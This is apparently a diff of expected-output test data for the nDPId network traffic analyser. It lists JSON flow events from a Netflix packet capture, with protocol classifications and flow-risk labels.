+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 